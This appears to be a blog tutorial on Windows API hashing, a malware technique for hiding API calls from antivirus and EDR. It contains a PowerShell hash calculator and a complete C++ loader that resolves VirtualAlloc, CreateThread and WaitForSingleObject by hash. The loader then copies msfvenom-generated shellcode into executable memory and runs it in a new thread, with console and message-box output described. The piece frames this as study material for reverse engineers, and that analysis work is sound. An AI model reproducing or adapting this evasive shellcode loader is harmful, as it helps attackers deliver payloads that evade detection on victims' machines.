Windows API Hashing in Malware

Windows API hashing is a common technique malware uses to obfuscate the API calls it makes to the operating system. It makes static analysis and detection by security solutions such as EDR (Endpoint Detection and Response) and antivirus (AV) more difficult, because the names of the functions being called never appear in the binary. Instead of calling API functions directly by name, the malware computes a hash of the function name and uses this hash to resolve the function’s address at runtime.

How Does It Work?

Rather than referencing API function names directly, malware stores a hash of each function name it intends to call. When the malware executes, it parses the export table of each loaded DLL of interest (kernel32.dll, user32.dll, and so on), which lists the functions that DLL exports by name. It applies the same hashing algorithm to every exported name and compares the result with its pre-calculated hashes. When a hash matches, it retrieves the corresponding function address and calls the function through that pointer.
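The hash-and-compare step described above can be sketched in portable C++ without touching a real PE image. The sketch reuses the hash shown later in this article (seed 0x35, multiplier 0xab10f29f, 24-bit mask); the function names api_hash and find_by_hash and the plain vector of names are assumptions made for illustration, standing in for a walk over a real export name table.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Same recurrence as the article's CalculateHash: seed 0x35, multiplier
// 0xab10f29f, result masked to 24 bits after every character.
std::uint32_t api_hash(const std::string& name) {
    std::uint32_t h = 0x35;
    for (unsigned char c : name) {
        h = (h * 0xab10f29fu + c) & 0xFFFFFFu;
    }
    return h;
}

// Hypothetical stand-in for walking an export name table: returns the index
// of the first name whose hash equals target, or -1 if no name matches.
int find_by_hash(const std::vector<std::string>& export_names,
                 std::uint32_t target) {
    for (std::size_t i = 0; i < export_names.size(); ++i) {
        if (api_hash(export_names[i]) == target) {
            return static_cast<int>(i);
        }
    }
    return -1;
}
```

Given a list whose first entry is "VirtualAlloc", find_by_hash(names, api_hash("VirtualAlloc")) returns 0. Only the numeric target has to be stored by the caller, which is why the name itself need not appear in the program that performs the lookup.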

Ordinals and Hashing

Some malware resolves API functions by ordinal instead, using the numeric identifier a DLL assigns to each export. This is a shortcut when a DLL keeps a function's ordinal stable, but ordinals can change between operating systems and versions. Hashing the export names is therefore the more common technique: it does not depend on static ordinals and stays valid wherever the function keeps its name.
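The difference between the two lookups is easier to see on a simplified model of the export directory. The sketch below is an assumption-laden illustration, not a PE parser: MockExports, rva_by_name, and rva_by_ordinal are hypothetical names, and plain values replace the RVAs a real image stores. It only mirrors the layout of the three export tables and the ordinal base.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Simplified, hypothetical model of a PE export directory.
struct MockExports {
    std::uint32_t ordinal_base;                // "Base" field of the directory
    std::vector<std::string> names;            // models AddressOfNames
    std::vector<std::uint16_t> name_ordinals;  // models AddressOfNameOrdinals
    std::vector<std::uint32_t> functions;      // models AddressOfFunctions
};

// By name: name index -> unbiased index from name_ordinals -> function RVA.
std::uint32_t rva_by_name(const MockExports& e, const std::string& name) {
    for (std::size_t i = 0; i < e.names.size(); ++i) {
        if (e.names[i] == name) {
            return e.functions[e.name_ordinals[i]];
        }
    }
    return 0;  // not found
}

// By ordinal: subtract the base, then index the function table directly.
std::uint32_t rva_by_ordinal(const MockExports& e, std::uint32_t ordinal) {
    if (ordinal < e.ordinal_base) return 0;
    std::uint32_t idx = ordinal - e.ordinal_base;
    return idx < e.functions.size() ? e.functions[idx] : 0;
}
```

The ordinal path skips the name table entirely, which is what makes it a shortcut. It is also what makes it fragile: if a later build of the DLL reorders the function table, the same ordinal returns a different function, while a name (or name hash) lookup still finds the right entry.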

PowerShell Script to Calculate API Hashes

The script below calculates API hashes in PowerShell. It iterates through a list of API function names, computes each hash, and reports any hash collisions. Malware developers typically run this kind of calculation ahead of time and embed only the resulting constants; at runtime, the same algorithm is applied to the export names of a loaded DLL.

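function Calculate-ApiHash {
    param (
        [string]$apiName
    )

    # Seed value; the C++ resolver must use the same seed.
    $hash = 0x35

    $apiName.ToCharArray() | ForEach-Object {
        # Numeric character code of the current character
        $c = [int64][char]$_

        # Multiply, add the character code, then keep only the low 24 bits.
        $hash = (($hash * 0xab10f29f) + $c) -band 0xFFFFFF
    }

    return $hash
}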

function Check-HashCollision {
    param (
        [hashtable]$hashTable, 
        [string]$apiName,      
        [int64]$hash           
    )

    if ($hashTable.ContainsKey($hash)) {
        $existingApi = $hashTable[$hash]
        if ($existingApi -ne $apiName) {
            Write-Host "Hash collision detected! API '$apiName' and API '$existingApi' share the same hash: 0x$([string]::Format("{0:X}", $hash))" -ForegroundColor Red
        }
    } else {
        $hashTable[$hash] = $apiName
    }
}

$APIsToHash = @("CreateThread", "VirtualAlloc", "LoadLibraryA", "CreateFileA", "CreateThread")

# Hashtable to store hashes and detect collisions
$hashes = @{}

$APIsToHash | ForEach-Object {
    $api = $_
    
    $hash = Calculate-ApiHash -apiName $api
    
    $hashHex = '0x{0:X}' -f $hash
    Write-Host "API: $api, Hash: $hashHex"
    
    Check-HashCollision -hashTable $hashes -apiName $api -hash $hash
}

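For each name, the script prints the hash in hexadecimal and records it in a hashtable. If two different API names produce the same hash, it reports the collision. A repeated name, such as the second CreateThread in the list, is not reported, because the name already stored for that hash is identical.

Collisions matter because the hash is truncated to 24 bits: a resolver that matches on the hash alone returns whichever colliding export it encounters first.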
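For reverse engineers, the same calculation is usually run in the opposite direction: hash a list of candidate export names once, then look up the constants found in a sample. The following is a minimal sketch of that idea in portable C++, assuming the hash parameters used in this article; HashTable, build_lookup, names_for, and collision_count are hypothetical names, and the candidate list would in practice come from the export tables of the DLLs under suspicion.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <map>
#include <string>
#include <vector>

using HashTable = std::map<std::uint32_t, std::vector<std::string>>;

// Same hash as the PowerShell script: seed 0x35, multiplier 0xab10f29f,
// masked to 24 bits after every character.
std::uint32_t api_hash(const std::string& name) {
    std::uint32_t h = 0x35;
    for (unsigned char c : name) {
        h = (h * 0xab10f29fu + c) & 0xFFFFFFu;
    }
    return h;
}

// Map each hash to every distinct candidate name that produces it.
HashTable build_lookup(const std::vector<std::string>& candidates) {
    HashTable table;
    for (const auto& name : candidates) {
        auto& bucket = table[api_hash(name)];
        // Skip exact duplicates so a repeated name is not counted as a collision.
        if (std::find(bucket.begin(), bucket.end(), name) == bucket.end()) {
            bucket.push_back(name);
        }
    }
    return table;
}

// Names that may correspond to a hash constant found in a sample.
std::vector<std::string> names_for(const HashTable& table, std::uint32_t hash) {
    auto it = table.find(hash);
    return it == table.end() ? std::vector<std::string>{} : it->second;
}

// Number of hash values shared by two or more different names.
std::size_t collision_count(const HashTable& table) {
    std::size_t n = 0;
    for (const auto& entry : table) {
        if (entry.second.size() > 1) ++n;
    }
    return n;
}
```

Keeping a vector per hash, rather than a single name, means a collision shows up as a bucket with several candidates instead of silently overwriting an earlier entry.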

C++ Implementation for Resolving Functions by Hash

Below is a C++ implementation that resolves API function addresses dynamically from pre-calculated hash values. Its CalculateHash function uses the same parameters as the PowerShell script (seed 0x35, multiplier 0xab10f29f, 24-bit mask) and is applied to each exported function name in a module such as kernel32.dll. If the hash matches a target hash, the code retrieves the corresponding function address and calls the function through it.

#include <Windows.h>
#include <iostream>

DWORD CalculateHash(const char* functionName) {
    DWORD hash = 0x35;  

    while (*functionName) {
        hash = (hash * 0xab10f29f) + (*functionName);
        hash &= 0xFFFFFF;  
        functionName++;
    }

    return hash;
}

HMODULE GetModuleBase(const char* moduleName) {
    HMODULE hModule = GetModuleHandleA(moduleName);
    return hModule;
}

FARPROC ResolveFunctionByHash(HMODULE hModule, DWORD targetHash) {
    if (!hModule) return nullptr;

    // Walk the PE headers from the module base to the export directory.
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);

    DWORD exportDirRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!exportDirRVA) return nullptr;  // module has no export table
    PIMAGE_EXPORT_DIRECTORY exportDir = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule + exportDirRVA);

    // Parallel tables: namesRVA[i] pairs with nameOrdinals[i], which indexes functionsRVA[].
    DWORD* namesRVA = (DWORD*)((BYTE*)hModule + exportDir->AddressOfNames);
    WORD* nameOrdinals = (WORD*)((BYTE*)hModule + exportDir->AddressOfNameOrdinals);
    DWORD* functionsRVA = (DWORD*)((BYTE*)hModule + exportDir->AddressOfFunctions);

    for (DWORD i = 0; i < exportDir->NumberOfNames; i++) {
        const char* functionName = (const char*)((BYTE*)hModule + namesRVA[i]);

        // Hash each exported name and compare it with the target.
        if (CalculateHash(functionName) == targetHash) {
            // A forwarded export's RVA points to a forwarder string, not code;
            // this example does not handle that case.
            DWORD functionRVA = functionsRVA[nameOrdinals[i]];
            return (FARPROC)((BYTE*)hModule + functionRVA);
        }
    }

    return nullptr;  // no exported name produced the target hash
}

// msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f c 
unsigned char shellcode[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"...";  // shortened for brevity

int main() {
    DWORD hashVirtualAlloc = 0xE0DABF;
    DWORD hashCreateThread = 0xF92F7B;
    DWORD hashWaitForSingleObject = CalculateHash("WaitForSingleObject");

    std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl;

    HMODULE hKernel32 = GetModuleBase("kernel32.dll");

    if (!hKernel32) {
        std::cerr << "Could not retrieve the base address of kernel32.dll.\n";
        return -1;
    }

    typedef LPVOID(WINAPI* pVirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD);
    pVirtualAlloc_t pVirtualAlloc = (pVirtualAlloc_t)ResolveFunctionByHash(hKernel32, hashVirtualAlloc);
    if (!pVirtualAlloc) {
        std::cerr << "Could not find VirtualAlloc.\n";
        return -1;
    }
    std::cout << "Hash calculated for VirtualAlloc: 0x" << std::hex << hashVirtualAlloc << std::endl;

    typedef HANDLE(WINAPI* pCreateThread_t)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
    pCreateThread_t pCreateThread = (pCreateThread_t)ResolveFunctionByHash(hKernel32, hashCreateThread);
    if (!pCreateThread) {
        std::cerr << "Could not find CreateThread.\n";
        return -1;
    }
    std::cout << "Hash calculated for CreateThread: 0x" << std::hex << hashCreateThread << std::endl;

    typedef DWORD(WINAPI* pWaitForSingleObject_t)(HANDLE, DWORD);
    pWaitForSingleObject_t pWaitForSingleObject = (pWaitForSingleObject_t)ResolveFunctionByHash(hKernel32, hashWaitForSingleObject);
    if (!pWaitForSingleObject) {
        std::cerr << "Could not find WaitForSingleObject.\n";
        return -1;
    }

    std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl;

    LPVOID execMem = pVirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!execMem) {
        std::cerr << "Failed to allocate memory.\n";
        return -1;
    }

    memcpy(execMem, shellcode, sizeof(shellcode));

    HANDLE hThread = pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)execMem, NULL, 0, NULL);
    if (!hThread) {
        std::cerr << "Failed to create thread.\n";
        return -1;
    }

    pWaitForSingleObject(hThread, INFINITE);

    return 0;
}

The screenshot shows the output of the Windows API hashing program, which prints the hash values for VirtualAlloc, CreateThread, and WaitForSingleObject:

  • The calculated hash for WaitForSingleObject is 0x397566.

  • The hash for VirtualAlloc is 0xe0dabf.

  • The hash for CreateThread is 0xf92f7b.

  • The hash for WaitForSingleObject is displayed twice because main() prints the same variable once right after computing it and again after the function has been resolved.

On the right side, a message box is displayed with the title "hello" and the text "joas". It is produced by the msfvenom-generated shellcode, which calls the MessageBox function once it runs in memory after the necessary APIs have been resolved through the hashing mechanism shown above. The msfvenom command in the code comment specifies TEXT=hello, so the screenshot appears to come from a build generated with a different TEXT value.

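Together, the console output and the message box show that both parts work: the APIs are resolved at runtime from their hashes, and the shellcode executes. Note that only VirtualAlloc and CreateThread are referenced purely by pre-calculated hash. WaitForSingleObject is hashed at runtime from a string literal, so that name still appears in the compiled binary.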

Conclusion

Windows API hashing is a technique malware often uses to obfuscate its API calls, making it harder for security solutions to detect malicious behavior through static analysis. By storing hash values instead of function names, malware can resolve functions dynamically and keep telltale API names out of its imports and strings. The technique is useful to malware developers, but studying it is also a good exercise for ethical hackers and reverse engineers who need to understand and counter such threats. The PowerShell script and C++ code above demonstrate the basic principles of API hashing.
